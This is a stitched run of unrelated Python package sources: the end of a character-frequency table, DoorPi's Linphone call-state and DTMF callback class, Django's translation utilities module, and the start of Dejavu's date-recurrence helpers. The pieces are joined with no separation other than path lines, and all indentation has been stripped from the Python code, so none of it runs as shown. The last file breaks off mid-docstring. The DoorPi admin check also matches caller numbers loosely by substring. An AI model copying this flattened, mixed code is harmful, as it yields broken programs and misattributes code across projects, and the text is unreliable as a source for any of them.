7172,7173,3104,3360,3420,4490,4051,2684,4052,7174,4053,7175,7176,7177,2253,4054, # 6448
7178,7179,4895,7180,3152,3890,3153,4491,3216,7181,7182,7183,2968,4238,4492,4055, # 6464
7184,2990,7185,2479,7186,7187,4493,7188,7189,7190,7191,7192,4896,7193,4897,2969, # 6480
4494,4898,7194,3495,7195,7196,4899,4495,7197,3105,2731,7198,4900,7199,7200,7201, # 6496
4056,7202,3361,7203,7204,4496,4901,4902,7205,4497,7206,7207,2315,4903,7208,4904, # 6512
7209,4905,2851,7210,7211,3577,7212,3578,4906,7213,4057,3667,4907,7214,4058,2354, # 6528
3891,2376,3217,3773,7215,7216,7217,7218,7219,4498,7220,4908,3282,2685,7221,3496, # 6544
4909,2632,3154,4910,7222,2337,7223,4911,7224,7225,7226,4912,4913,3283,4239,4499, # 6560
7227,2816,7228,7229,7230,7231,7232,7233,7234,4914,4500,4501,7235,7236,7237,2686, # 6576
7238,4915,7239,2897,4502,7240,4503,7241,2516,7242,4504,3362,3218,7243,7244,7245, # 6592
4916,7246,7247,4505,3363,7248,7249,7250,7251,3774,4506,7252,7253,4917,7254,7255, # 6608
3284,2991,4918,4919,3219,3892,4920,3106,3497,4921,7256,7257,7258,4922,7259,4923, # 6624
3364,4507,4508,4059,7260,4240,3498,7261,7262,4924,7263,2992,3893,4060,3220,7264, # 6640
7265,7266,7267,7268,7269,4509,3775,7270,2817,7271,4061,4925,4510,3776,7272,4241, # 6656
4511,3285,7273,7274,3499,7275,7276,7277,4062,4512,4926,7278,3107,3894,7279,7280, # 6672
4927,7281,4513,7282,7283,3668,7284,7285,4242,4514,4243,7286,2058,4515,4928,4929, # 6688
4516,7287,3286,4244,7288,4517,7289,7290,7291,3669,7292,7293,4930,4931,4932,2355, # 6704
4933,7294,2633,4518,7295,4245,7296,7297,4519,7298,7299,4520,4521,4934,7300,4246, # 6720
4522,7301,7302,7303,3579,7304,4247,4935,7305,4936,7306,7307,7308,7309,3777,7310, # 6736
4523,7311,7312,7313,4248,3580,7314,4524,3778,4249,7315,3581,7316,3287,7317,3221, # 6752
7318,4937,7319,7320,7321,7322,7323,7324,4938,4939,7325,4525,7326,7327,7328,4063, # 6768
7329,7330,4940,7331,7332,4941,7333,4526,7334,3500,2780,1741,4942,2026,1742,7335, # 6784
7336,3582,4527,2388,7337,7338,7339,4528,7340,4250,4943,7341,7342,7343,4944,7344, # 6800
7345,7346,3020,7347,4945,7348,7349,7350,7351,3895,7352,3896,4064,3897,7353,7354, # 6816
7355,4251,7356,7357,3898,7358,3779,7359,3780,3288,7360,7361,4529,7362,4946,4530, # 6832
2027,7363,3899,4531,4947,3222,3583,7364,4948,7365,7366,7367,7368,4949,3501,4950, # 6848
3781,4951,4532,7369,2517,4952,4252,4953,3155,7370,4954,4955,4253,2518,4533,7371, # 6864
7372,2712,4254,7373,7374,7375,3670,4956,3671,7376,2389,3502,4065,7377,2338,7378, # 6880
7379,7380,7381,3061,7382,4957,7383,7384,7385,7386,4958,4534,7387,7388,2993,7389, # 6896
3062,7390,4959,7391,7392,7393,4960,3108,4961,7394,4535,7395,4962,3421,4536,7396, # 6912
4963,7397,4964,1857,7398,4965,7399,7400,2176,3584,4966,7401,7402,3422,4537,3900, # 6928
3585,7403,3782,7404,2852,7405,7406,7407,4538,3783,2654,3423,4967,4539,7408,3784, # 6944
3586,2853,4540,4541,7409,3901,7410,3902,7411,7412,3785,3109,2327,3903,7413,7414, # 6960
2970,4066,2932,7415,7416,7417,3904,3672,3424,7418,4542,4543,4544,7419,4968,7420, # 6976
7421,4255,7422,7423,7424,7425,7426,4067,7427,3673,3365,4545,7428,3110,2559,3674, # 6992
7429,7430,3156,7431,7432,3503,7433,3425,4546,7434,3063,2873,7435,3223,4969,4547, # 7008
4548,2898,4256,4068,7436,4069,3587,3786,2933,3787,4257,4970,4971,3788,7437,4972, # 7024
3064,7438,4549,7439,7440,7441,7442,7443,4973,3905,7444,2874,7445,7446,7447,7448, # 7040
3021,7449,4550,3906,3588,4974,7450,7451,3789,3675,7452,2578,7453,4070,7454,7455, # 7056
7456,4258,3676,7457,4975,7458,4976,4259,3790,3504,2634,4977,3677,4551,4260,7459, # 7072
7460,7461,7462,3907,4261,4978,7463,7464,7465,7466,4979,4980,7467,7468,2213,4262, # 7088
7469,7470,7471,3678,4981,7472,2439,7473,4263,3224,3289,7474,3908,2415,4982,7475, # 7104
4264,7476,4983,2655,7477,7478,2732,4552,2854,2875,7479,7480,4265,7481,4553,4984, # 7120
7482,7483,4266,7484,3679,3366,3680,2818,2781,2782,3367,3589,4554,3065,7485,4071, # 7136
2899,7486,7487,3157,2462,4072,4555,4073,4985,4986,3111,4267,2687,3368,4556,4074, # 7152
3791,4268,7488,3909,2783,7489,2656,1962,3158,4557,4987,1963,3159,3160,7490,3112, # 7168
4988,4989,3022,4990,4991,3792,2855,7491,7492,2971,4558,7493,7494,4992,7495,7496, # 7184
7497,7498,4993,7499,3426,4559,4994,7500,3681,4560,4269,4270,3910,7501,4075,4995, # 7200
4271,7502,7503,4076,7504,4996,7505,3225,4997,4272,4077,2819,3023,7506,7507,2733, # 7216
4561,7508,4562,7509,3369,3793,7510,3590,2508,7511,7512,4273,3113,2994,2616,7513, # 7232
7514,7515,7516,7517,7518,2820,3911,4078,2748,7519,7520,4563,4998,7521,7522,7523, # 7248
7524,4999,4274,7525,4564,3682,2239,4079,4565,7526,7527,7528,7529,5000,7530,7531, # 7264
5001,4275,3794,7532,7533,7534,3066,5002,4566,3161,7535,7536,4080,7537,3162,7538, # 7280
7539,4567,7540,7541,7542,7543,7544,7545,5003,7546,4568,7547,7548,7549,7550,7551, # 7296
7552,7553,7554,7555,7556,5004,7557,7558,7559,5005,7560,3795,7561,4569,7562,7563, # 7312
7564,2821,3796,4276,4277,4081,7565,2876,7566,5006,7567,7568,2900,7569,3797,3912, # 7328
7570,7571,7572,4278,7573,7574,7575,5007,7576,7577,5008,7578,7579,4279,2934,7580, # 7344
7581,5009,7582,4570,7583,4280,7584,7585,7586,4571,4572,3913,7587,4573,3505,7588, # 7360
5010,7589,7590,7591,7592,3798,4574,7593,7594,5011,7595,4281,7596,7597,7598,4282, # 7376
5012,7599,7600,5013,3163,7601,5014,7602,3914,7603,7604,2734,4575,4576,4577,7605, # 7392
7606,7607,7608,7609,3506,5015,4578,7610,4082,7611,2822,2901,2579,3683,3024,4579, # 7408
3507,7612,4580,7613,3226,3799,5016,7614,7615,7616,7617,7618,7619,7620,2995,3290, # 7424
7621,4083,7622,5017,7623,7624,7625,7626,7627,4581,3915,7628,3291,7629,5018,7630, # 7440
7631,7632,7633,4084,7634,7635,3427,3800,7636,7637,4582,7638,5019,4583,5020,7639, # 7456
3916,7640,3801,5021,4584,4283,7641,7642,3428,3591,2269,7643,2617,7644,4585,3592, # 7472
7645,4586,2902,7646,7647,3227,5022,7648,4587,7649,4284,7650,7651,7652,4588,2284, # 7488
7653,5023,7654,7655,7656,4589,5024,3802,7657,7658,5025,3508,4590,7659,7660,7661, # 7504
1969,5026,7662,7663,3684,1821,2688,7664,2028,2509,4285,7665,2823,1841,7666,2689, # 7520
3114,7667,3917,4085,2160,5027,5028,2972,7668,5029,7669,7670,7671,3593,4086,7672, # 7536
4591,4087,5030,3803,7673,7674,7675,7676,7677,7678,7679,4286,2366,4592,4593,3067, # 7552
2328,7680,7681,4594,3594,3918,2029,4287,7682,5031,3919,3370,4288,4595,2856,7683, # 7568
3509,7684,7685,5032,5033,7686,7687,3804,2784,7688,7689,7690,7691,3371,7692,7693, # 7584
2877,5034,7694,7695,3920,4289,4088,7696,7697,7698,5035,7699,5036,4290,5037,5038, # 7600
5039,7700,7701,7702,5040,5041,3228,7703,1760,7704,5042,3229,4596,2106,4089,7705, # 7616
4597,2824,5043,2107,3372,7706,4291,4090,5044,7707,4091,7708,5045,3025,3805,4598, # 7632
4292,4293,4294,3373,7709,4599,7710,5046,7711,7712,5047,5048,3806,7713,7714,7715, # 7648
5049,7716,7717,7718,7719,4600,5050,7720,7721,7722,5051,7723,4295,3429,7724,7725, # 7664
7726,7727,3921,7728,3292,5052,4092,7729,7730,7731,7732,7733,7734,7735,5053,5054, # 7680
7736,7737,7738,7739,3922,3685,7740,7741,7742,7743,2635,5055,7744,5056,4601,7745, # 7696
7746,2560,7747,7748,7749,7750,3923,7751,7752,7753,7754,7755,4296,2903,7756,7757, # 7712
7758,7759,7760,3924,7761,5057,4297,7762,7763,5058,4298,7764,4093,7765,7766,5059, # 7728
3925,7767,7768,7769,7770,7771,7772,7773,7774,7775,7776,3595,7777,4299,5060,4094, # 7744
7778,3293,5061,7779,7780,4300,7781,7782,4602,7783,3596,7784,7785,3430,2367,7786, # 7760
3164,5062,5063,4301,7787,7788,4095,5064,5065,7789,3374,3115,7790,7791,7792,7793, # 7776
7794,7795,7796,3597,4603,7797,7798,3686,3116,3807,5066,7799,7800,5067,7801,7802, # 7792
4604,4302,5068,4303,4096,7803,7804,3294,7805,7806,5069,4605,2690,7807,3026,7808, # 7808
7809,7810,7811,7812,7813,7814,7815,7816,7817,7818,7819,7820,7821,7822,7823,7824, # 7824
7825,7826,7827,7828,7829,7830,7831,7832,7833,7834,7835,7836,7837,7838,7839,7840, # 7840
7841,7842,7843,7844,7845,7846,7847,7848,7849,7850,7851,7852,7853,7854,7855,7856, # 7856
7857,7858,7859,7860,7861,7862,7863,7864,7865,7866,7867,7868,7869,7870,7871,7872, # 7872
7873,7874,7875,7876,7877,7878,7879,7880,7881,7882,7883,7884,7885,7886,7887,7888, # 7888
7889,7890,7891,7892,7893,7894,7895,7896,7897,7898,7899,7900,7901,7902,7903,7904, # 7904
7905,7906,7907,7908,7909,7910,7911,7912,7913,7914,7915,7916,7917,7918,7919,7920, # 7920
7921,7922,7923,7924,3926,7925,7926,7927,7928,7929,7930,7931,7932,7933,7934,7935, # 7936
7936,7937,7938,7939,7940,7941,7942,7943,7944,7945,7946,7947,7948,7949,7950,7951, # 7952
7952,7953,7954,7955,7956,7957,7958,7959,7960,7961,7962,7963,7964,7965,7966,7967, # 7968
7968,7969,7970,7971,7972,7973,7974,7975,7976,7977,7978,7979,7980,7981,7982,7983, # 7984
7984,7985,7986,7987,7988,7989,7990,7991,7992,7993,7994,7995,7996,7997,7998,7999, # 8000
8000,8001,8002,8003,8004,8005,8006,8007,8008,8009,8010,8011,8012,8013,8014,8015, # 8016
8016,8017,8018,8019,8020,8021,8022,8023,8024,8025,8026,8027,8028,8029,8030,8031, # 8032
8032,8033,8034,8035,8036,8037,8038,8039,8040,8041,8042,8043,8044,8045,8046,8047, # 8048
8048,8049,8050,8051,8052,8053,8054,8055,8056,8057,8058,8059,8060,8061,8062,8063, # 8064
8064,8065,8066,8067,8068,8069,8070,8071,8072,8073,8074,8075,8076,8077,8078,8079, # 8080
8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095, # 8096
8096,8097,8098,8099,8100,8101,8102,8103,8104,8105,8106,8107,8108,8109,8110,8111, # 8112
8112,8113,8114,8115,8116,8117,8118,8119,8120,8121,8122,8123,8124,8125,8126,8127, # 8128
8128,8129,8130,8131,8132,8133,8134,8135,8136,8137,8138,8139,8140,8141,8142,8143, # 8144
8144,8145,8146,8147,8148,8149,8150,8151,8152,8153,8154,8155,8156,8157,8158,8159, # 8160
8160,8161,8162,8163,8164,8165,8166,8167,8168,8169,8170,8171,8172,8173,8174,8175, # 8176
8176,8177,8178,8179,8180,8181,8182,8183,8184,8185,8186,8187,8188,8189,8190,8191, # 8192
8192,8193,8194,8195,8196,8197,8198,8199,8200,8201,8202,8203,8204,8205,8206,8207, # 8208
8208,8209,8210,8211,8212,8213,8214,8215,8216,8217,8218,8219,8220,8221,8222,8223, # 8224
8224,8225,8226,8227,8228,8229,8230,8231,8232,8233,8234,8235,8236,8237,8238,8239, # 8240
8240,8241,8242,8243,8244,8245,8246,8247,8248,8249,8250,8251,8252,8253,8254,8255, # 8256
8256,8257,8258,8259,8260,8261,8262,8263,8264,8265,8266,8267,8268,8269,8270,8271) # 8272
# flake8: noqa | PypiClean |
/DoorPi-2.4.1.8.tar.gz/DoorPi-2.4.1.8/doorpi/sipphone/linphone_lib/CallBacks.py |
import logging
logger = logging.getLogger(__name__)
logger.debug("%s loaded", __name__)
from time import sleep
import linphone
from doorpi import DoorPi
class LinphoneCallbacks:
@property
def used_callbacks(self): return {
#http://www.linphone.org/docs/liblinphone/struct__LinphoneCoreVTable.html
#'global_state_changed': self.global_state_changed, #Notifies global state changes
#'registration_state_changed': self.registration_state_changed, #Notifies registration state changes
'call_state_changed': self.call_state_changed, #Notifies call state changes
#'notify_presence_received': self.notify_presence_received, #Notify received presence events
#'new_subscription_requested': self.new_subscription_requested, #Notify about pending presence subscription request
#'auth_info_requested': self.auth_info_requested, #Ask the application some authentication information
#'call_log_updated': self.call_log_updated, #Notifies that call log list has been updated
#'message_received': self.message_received, #a message is received, can be text or external body
#'is_composing_received': self.is_composing_received, #An is-composing notification has been received
'dtmf_received': self.dtmf_received, #A dtmf has been received received
#'refer_received': self.refer_received, #An out of call refer was received
#'call_encryption_changed': self.call_encryption_changed, #Notifies on change in the encryption of call streams
#'transfer_state_changed': self.transfer_state_changed, #Notifies when a transfer is in progress
#'buddy_info_updated': self.buddy_info_updated, #a LinphoneFriend's BuddyInfo has changed
#'call_stats_updated': self.call_stats_updated, #Notifies on refreshing of call's statistics.
#'info_received': self.info_received, #Notifies an incoming informational message received.
#'subscription_state_changed': self.subscription_state_changed, #Notifies subscription state change
#'notify_received': self.notify_received, #Notifies a an event notification, see linphone_core_subscribe()
#'configuring_status': self.configuring_status, #Notifies publish state change (only from LinphoneEvent api)
#'network_reachable': self.network_reachable, #Callback to report IP network status (I.E up/down )
#'log_collection_upload_state_changed': self.log_collection_upload_state_changed, #Callback to upload collected logs
#'log_collection_upload_progress_indication': self.log_collection_upload_progress_indication #Callback to indicate log collection upload progress
}
@property
def whitelist(self): return DoorPi().config.get_keys('AdminNumbers')
def is_admin_number(self, remote_uri):
logger.debug("is_admin_number (%s)",remote_uri)
for admin_number in self.whitelist:
if "sip:"+admin_number+"@" in remote_uri:
logger.debug("%s is adminnumber %s", remote_uri, admin_number)
return True
if "sip:"+admin_number is remote_uri:
logger.debug("%s is adminnumber %s", remote_uri, admin_number)
return True
logger.debug("%s is not an adminnumber", remote_uri)
return False
__DTMF = ''
__possible_DTMF = []
def __init__(self):
logger.debug("__init__")
self._last_number_of_calls = 0
DoorPi().event_handler.register_action('OnSipPhoneDestroy', self.destroy)
DoorPi().event_handler.register_event('OnCallMediaStateChange', __name__)
DoorPi().event_handler.register_event('OnMediaRequired', __name__)
DoorPi().event_handler.register_event('OnMediaNotRequired', __name__)
DoorPi().event_handler.register_event('OnCallStateChange', __name__)
DoorPi().event_handler.register_event('OnCallStateConnect', __name__)
DoorPi().event_handler.register_event('AfterCallStateConnect', __name__)
DoorPi().event_handler.register_event('OnCallStateDisconnect', __name__)
DoorPi().event_handler.register_event('AfterCallStateDisconnect', __name__)
DoorPi().event_handler.register_event('OnCallStateDismissed', __name__)
DoorPi().event_handler.register_event('OnCallStateReject', __name__)
DoorPi().event_handler.register_event('OnCallStart', __name__)
DoorPi().event_handler.register_event('OnDTMF', __name__)
self.__possible_DTMF = DoorPi().config.get_keys('DTMF')
for DTMF in self.__possible_DTMF:
DoorPi().event_handler.register_event('OnDTMF_'+DTMF, __name__)
DoorPi().event_handler.register_event('OnCallStart', __name__)
DoorPi().event_handler.register_event('BeforeCallIncoming', __name__)
DoorPi().event_handler.register_event('OnCallReconnect', __name__)
DoorPi().event_handler.register_event('AfterCallReconnect', __name__)
DoorPi().event_handler.register_event('OnCallBusy', __name__)
DoorPi().event_handler.register_event('AfterCallBusy', __name__)
DoorPi().event_handler.register_event('OnCallIncoming', __name__)
DoorPi().event_handler.register_event('AfterCallIncoming', __name__)
DoorPi().event_handler.register_event('OnCallReject', __name__)
DoorPi().event_handler.register_event('AfterCallReject', __name__)
#DoorPi().event_handler.register_event('AfterAccountRegState', __name__)
DoorPi().event_handler('OnCallStart', __name__)
def destroy(self):
logger.debug("destroy")
DoorPi().event_handler.unregister_source(__name__, True)
def global_state_changed(self, core, global_state, message): pass
def registration_state_changed(self, core, linphone_proxy_config, state, message): pass
def call_state_changed(self, core, call, call_state, message):
self.call_state_changed_handle(core, call, call_state, message)
if core.calls_nb > 0 and self._last_number_of_calls == 0:
DoorPi().event_handler('OnMediaRequired', __name__)
elif self._last_number_of_calls is not core.calls_nb:
DoorPi().event_handler('OnMediaNotRequired', __name__)
self._last_number_of_calls = core.calls_nb
def call_state_changed_handle(self, core, call, call_state, message):
logger.debug("call_state_changed (%s - %s)", call_state, message)
remote_uri = call.remote_address.as_string_uri_only()
DoorPi().event_handler('OnCallStateChange', __name__, {
'remote_uri': remote_uri,
'call_state': call_state,
'state': message
})
if call_state == linphone.CallState.Idle:
pass
elif call_state == linphone.CallState.IncomingReceived:
DoorPi().event_handler('BeforeCallIncoming', __name__, {'remote_uri': remote_uri})
if core.current_call and core.current_call.state > linphone.CallState.IncomingReceived:
logger.debug("Incoming call while another call is active")
logger.debug("- incoming.remote_uri: %s", call)
logger.debug("- current.remote_uri : %s", core.current_call)
if core.current_call.remote_address.as_string_uri_only() == remote_uri:
logger.info("Current call is incoming call - quitting current and connecting to incoming. Maybe connection reset?")
DoorPi().event_handler('OnCallReconnect', __name__, {'remote_uri': remote_uri})
core.terminate_call(core.current_call)
DoorPi().sipphone.reset_call_start_datetime()
core.accept_call_with_params(call, DoorPi().sipphone.base_config)
DoorPi().event_handler('AfterCallReconnect', __name__)
return
else:
if self.is_admin_number(remote_uri):
logger.info("Incoming and current call are different - incoming is AdminNumber, so hanging up current call")
DoorPi().event_handler('OnCallIncoming', __name__, {'remote_uri': remote_uri})
core.terminate_call(core.current_call)
DoorPi().sipphone.reset_call_start_datetime()
core.accept_call_with_params(call, DoorPi().sipphone.base_config)
DoorPi().event_handler('AfterCallIncoming', __name__, {'remote_uri': remote_uri})
return
else:
logger.info("Incoming and current call are different - sending busy signal to incoming call")
DoorPi().event_handler('OnCallBusy', __name__, {'remote_uri': remote_uri})
core.decline_call(call, linphone.Reason.Busy)
DoorPi().event_handler('AfterCallBusy', __name__)
return
if self.is_admin_number(remote_uri):
DoorPi().event_handler('OnCallIncoming', __name__, {'remote_uri': remote_uri})
DoorPi().sipphone.reset_call_start_datetime()
core.accept_call_with_params(call, DoorPi().sipphone.base_config)
DoorPi().event_handler('AfterCallIncoming', __name__, {'remote_uri': remote_uri})
return
else:
DoorPi().event_handler('OnCallReject', __name__)
core.decline_call(call, linphone.Reason.Forbidden) #Declined
DoorPi().event_handler('AfterCallReject', __name__)
return
elif call_state == linphone.CallState.OutgoingInit:
pass
elif call_state == linphone.CallState.OutgoingProgress:
pass
elif call_state == linphone.CallState.OutgoingRinging:
pass
elif call_state == linphone.CallState.OutgoingEarlyMedia:
DoorPi().event_handler('OnCallMediaStateChange', __name__)
elif call_state == linphone.CallState.Connected:
DoorPi().event_handler('OnCallStateConnect', __name__)
elif call_state == linphone.CallState.StreamsRunning:
DoorPi().event_handler('AfterCallStateConnect', __name__)
DoorPi().event_handler('OnCallMediaStateChange', __name__)
elif call_state == linphone.CallState.Pausing:
pass
elif call_state == linphone.CallState.Paused:
DoorPi().event_handler('OnCallMediaStateChange', __name__)
elif call_state == linphone.CallState.Resuming:
DoorPi().event_handler('OnCallStateConnect', __name__)
DoorPi().event_handler('OnCallMediaStateChange', __name__)
elif call_state == linphone.CallState.Refered:
pass
elif call_state == linphone.CallState.Error:
if message == "Busy here": DoorPi().event_handler('OnCallStateDismissed', __name__)
elif call_state == linphone.CallState.End:
if message == "Call declined.": DoorPi().event_handler('OnCallStateReject', __name__)
DoorPi().event_handler('OnCallStateDisconnect', __name__)
elif call_state == linphone.CallState.PausedByRemote:
pass
elif call_state == linphone.CallState.UpdatedByRemote:
pass
elif call_state == linphone.CallState.IncomingEarlyMedia:
DoorPi().event_handler('OnCallMediaStateChange', __name__)
elif call_state == linphone.CallState.Updating:
DoorPi().event_handler('OnCallStateConnect', __name__)
DoorPi().event_handler('OnCallMediaStateChange', __name__)
elif call_state == linphone.CallState.Released:
pass
elif call_state == linphone.CallState.EarlyUpdatedByRemote:
pass
elif call_state == linphone.CallState.EarlyUpdating:
pass
def notify_presence_received(self, core, linphone_friend): pass
def new_subscription_requested(self, core, linphone_friend, url): pass
def auth_info_requested(self, core, realm, username): pass
def call_log_updated(self, core, new_call_log_entry): pass
def message_received(self, core, linphone_chat_room, message): pass
def is_composing_received(self, core, linphone_chat_room): pass
def dtmf_received(self, core, call, digits):
logger.debug("on_dtmf_digit (%s)", str(digits))
digits = chr(digits)
DoorPi().event_handler('OnDTMF', __name__, {'digits':digits})
self.__DTMF += str(digits)
for DTMF in self.__possible_DTMF:
if self.__DTMF.endswith(DTMF[1:-1]):
DoorPi().event_handler('OnDTMF_'+DTMF+'', __name__, {
'remote_uri': str(call.remote_address.as_string_uri_only()),
'DTMF': str(self.__DTMF)
})
def refer_received(self, core, refer_to): pass
def call_encryption_changed(self, core, call, on, authentication_token): pass
def transfer_state_changed(self, core, call, transfer_state): pass
def buddy_info_updated(self, core, linphone_friend): pass
def call_stats_updated(self, core, call, stats): pass
def info_received(self, core, call, message): pass
def subscription_state_changed(self, core, linphone_event, linphone_subscription_state): pass
def notify_received(self, core, linphone_event, linphone_subscription_state, linphone_body): pass
def configuring_status(self, core, linphone_configuring_state, message): pass
def network_reachable(self, core, reachable): pass
def log_collection_upload_state_changed(self, core, linphone_core_log_collection_upload_state, info): pass
def log_collection_upload_progress_indication(self, core, offset, total): pass
__del__ = destroy | PypiClean |
/Django-4.2.4.tar.gz/Django-4.2.4/django/utils/translation/__init__.py | from contextlib import ContextDecorator
from decimal import ROUND_UP, Decimal
from django.utils.autoreload import autoreload_started, file_changed
from django.utils.functional import lazy
from django.utils.regex_helper import _lazy_re_compile
__all__ = [
"activate",
"deactivate",
"override",
"deactivate_all",
"get_language",
"get_language_from_request",
"get_language_info",
"get_language_bidi",
"check_for_language",
"to_language",
"to_locale",
"templatize",
"gettext",
"gettext_lazy",
"gettext_noop",
"ngettext",
"ngettext_lazy",
"pgettext",
"pgettext_lazy",
"npgettext",
"npgettext_lazy",
]
class TranslatorCommentWarning(SyntaxWarning):
pass
# Here be dragons, so a short explanation of the logic won't hurt:
# We are trying to solve two problems: (1) access settings, in particular
# settings.USE_I18N, as late as possible, so that modules can be imported
# without having to first configure Django, and (2) if some other code creates
# a reference to one of these functions, don't break that reference when we
# replace the functions with their real counterparts (once we do access the
# settings).
class Trans:
"""
The purpose of this class is to store the actual translation function upon
receiving the first call to that function. After this is done, changes to
USE_I18N will have no effect to which function is served upon request. If
your tests rely on changing USE_I18N, you can delete all the functions
from _trans.__dict__.
Note that storing the function with setattr will have a noticeable
performance effect, as access to the function goes the normal path,
instead of using __getattr__.
"""
def __getattr__(self, real_name):
from django.conf import settings
if settings.USE_I18N:
from django.utils.translation import trans_real as trans
from django.utils.translation.reloader import (
translation_file_changed,
watch_for_translation_changes,
)
autoreload_started.connect(
watch_for_translation_changes, dispatch_uid="translation_file_changed"
)
file_changed.connect(
translation_file_changed, dispatch_uid="translation_file_changed"
)
else:
from django.utils.translation import trans_null as trans
setattr(self, real_name, getattr(trans, real_name))
return getattr(trans, real_name)
_trans = Trans()
# The Trans class is no more needed, so remove it from the namespace.
del Trans
def gettext_noop(message):
return _trans.gettext_noop(message)
def gettext(message):
return _trans.gettext(message)
def ngettext(singular, plural, number):
return _trans.ngettext(singular, plural, number)
def pgettext(context, message):
return _trans.pgettext(context, message)
def npgettext(context, singular, plural, number):
return _trans.npgettext(context, singular, plural, number)
gettext_lazy = lazy(gettext, str)
pgettext_lazy = lazy(pgettext, str)
def lazy_number(func, resultclass, number=None, **kwargs):
if isinstance(number, int):
kwargs["number"] = number
proxy = lazy(func, resultclass)(**kwargs)
else:
original_kwargs = kwargs.copy()
class NumberAwareString(resultclass):
def __bool__(self):
return bool(kwargs["singular"])
def _get_number_value(self, values):
try:
return values[number]
except KeyError:
raise KeyError(
"Your dictionary lacks key '%s'. Please provide "
"it, because it is required to determine whether "
"string is singular or plural." % number
)
def _translate(self, number_value):
kwargs["number"] = number_value
return func(**kwargs)
def format(self, *args, **kwargs):
number_value = (
self._get_number_value(kwargs) if kwargs and number else args[0]
)
return self._translate(number_value).format(*args, **kwargs)
def __mod__(self, rhs):
if isinstance(rhs, dict) and number:
number_value = self._get_number_value(rhs)
else:
number_value = rhs
translated = self._translate(number_value)
try:
translated %= rhs
except TypeError:
# String doesn't contain a placeholder for the number.
pass
return translated
proxy = lazy(lambda **kwargs: NumberAwareString(), NumberAwareString)(**kwargs)
proxy.__reduce__ = lambda: (
_lazy_number_unpickle,
(func, resultclass, number, original_kwargs),
)
return proxy
def _lazy_number_unpickle(func, resultclass, number, kwargs):
return lazy_number(func, resultclass, number=number, **kwargs)
def ngettext_lazy(singular, plural, number=None):
return lazy_number(ngettext, str, singular=singular, plural=plural, number=number)
def npgettext_lazy(context, singular, plural, number=None):
return lazy_number(
npgettext, str, context=context, singular=singular, plural=plural, number=number
)
def activate(language):
return _trans.activate(language)
def deactivate():
return _trans.deactivate()
class override(ContextDecorator):
def __init__(self, language, deactivate=False):
self.language = language
self.deactivate = deactivate
def __enter__(self):
self.old_language = get_language()
if self.language is not None:
activate(self.language)
else:
deactivate_all()
def __exit__(self, exc_type, exc_value, traceback):
if self.old_language is None:
deactivate_all()
elif self.deactivate:
deactivate()
else:
activate(self.old_language)
def get_language():
return _trans.get_language()
def get_language_bidi():
return _trans.get_language_bidi()
def check_for_language(lang_code):
return _trans.check_for_language(lang_code)
def to_language(locale):
"""Turn a locale name (en_US) into a language name (en-us)."""
p = locale.find("_")
if p >= 0:
return locale[:p].lower() + "-" + locale[p + 1 :].lower()
else:
return locale.lower()
def to_locale(language):
"""Turn a language name (en-us) into a locale name (en_US)."""
lang, _, country = language.lower().partition("-")
if not country:
return language[:3].lower() + language[3:]
# A language with > 2 characters after the dash only has its first
# character after the dash capitalized; e.g. sr-latn becomes sr_Latn.
# A language with 2 characters after the dash has both characters
# capitalized; e.g. en-us becomes en_US.
country, _, tail = country.partition("-")
country = country.title() if len(country) > 2 else country.upper()
if tail:
country += "-" + tail
return lang + "_" + country
def get_language_from_request(request, check_path=False):
return _trans.get_language_from_request(request, check_path)
def get_language_from_path(path):
return _trans.get_language_from_path(path)
def get_supported_language_variant(lang_code, *, strict=False):
return _trans.get_supported_language_variant(lang_code, strict)
def templatize(src, **kwargs):
from .template import templatize
return templatize(src, **kwargs)
def deactivate_all():
return _trans.deactivate_all()
def get_language_info(lang_code):
from django.conf.locale import LANG_INFO
try:
lang_info = LANG_INFO[lang_code]
if "fallback" in lang_info and "name" not in lang_info:
info = get_language_info(lang_info["fallback"][0])
else:
info = lang_info
except KeyError:
if "-" not in lang_code:
raise KeyError("Unknown language code %s." % lang_code)
generic_lang_code = lang_code.split("-")[0]
try:
info = LANG_INFO[generic_lang_code]
except KeyError:
raise KeyError(
"Unknown language code %s and %s." % (lang_code, generic_lang_code)
)
if info:
info["name_translated"] = gettext_lazy(info["name"])
return info
trim_whitespace_re = _lazy_re_compile(r"\s*\n\s*")
def trim_whitespace(s):
return trim_whitespace_re.sub(" ", s.strip())
def round_away_from_one(value):
return int(Decimal(value - 1).quantize(Decimal("0"), rounding=ROUND_UP)) + 1 | PypiClean |
/Dejavu-1.5.0.zip/Dejavu-1.5.0/dejavu/recur.py | import datetime
import re
import threading
def sane_date(year, month, day, highzero=False):
"""Return a valid datetime.date even if parameters are out of bounds.
If the month param is out of bounds, both it and the year will be
modified relative to the first month of the given year.
If the day param is out of bounds, the day, month, and possibly year
will be modified. If the day param is zero or negative, then the
"zeroth day" of the given month is assumed to be the last day of the
previous month, unless highzero is True, in which case the "zeroth day"
is the last day of the given month.
Examples:
sane_date(2003, 2, 1) = datetime.date(2003, 2, 1)
sane_date(2003, -10, 13) = datetime.date(2002, 2, 13)
sane_date(2003, 12, -5) = datetime.date(2003, 11, 25)
sane_date(2003, 12, -5, highzero=True) = datetime.date(2003, 12, 26)
"""
while month > 12:
month -= 12
year += 1
while month < 1:
month += 12
year -= 1
if highzero and day < 1:
# Count backward from the first of *next* month.
firstOfMonth = sane_date(year, month + 1, 1)
else:
# Count backward/forward from the first of the current month.
firstOfMonth = datetime.date(year, month, 1)
newDate = firstOfMonth + datetime.timedelta(day - 1)
return newDate
def sane_time(day, hour, minute, second):
"""Return a valid (day, datetime.time) even if parameters are out of bounds.
If the hour param is out of bounds, both it and the day will
be modified. If negative, the day will be decremented.
If the minute param is out of bounds, both it and the hour will
be modified. If negative, the hour will be decremented.
If the second param is out of bounds, both it and the minute will
be modified. If negative, the minute will be decremented.
Examples:
sane_time(0, 4, 2, 1) = (0, datetime.time(4, 2, 1)
sane_time(0, 25, 2, 1) = (1, datetime.time(1, 2, 1)
sane_time(0, 4, 1440, 1) = (1, datetime.time(4, 2, 1)
sane_time(0, 0, 0, -1) = (-1, datetime.time(23, 59, 59)
"""
while second > 59:
second -= 60
minute += 1
while second < 0:
second += 60
minute -= 1
while minute > 59:
minute -= 60
hour += 1
while minute < 0:
minute += 60
hour -= 1
while hour > 23:
hour -= 24
day += 1
while hour < 0:
hour += 24
day -= 1
newTime = (day, datetime.time(hour, minute, second))
return newTime
def seconds(startDate, frequency=1, endDate=None):
"""Yield a sequence of datetimes, adding 'frequency' seconds each time.
For example:
seconds(datetime.datetime(2004, 5, 4, 14, 0), 6)
yields the sequence: 2004-05-04 14:00:00, 2004-05-04 14:00:06,
